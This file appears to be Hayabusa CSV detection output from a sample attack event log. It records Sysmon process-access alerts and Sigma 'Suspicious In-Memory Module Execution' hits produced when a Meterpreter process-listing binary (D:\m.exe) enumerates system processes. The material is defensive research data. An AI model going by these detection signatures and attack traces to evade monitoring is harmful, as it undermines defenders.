2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001020BA0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001017C50600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 365ABB72-F797-5CC7-0000-00105AF70A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
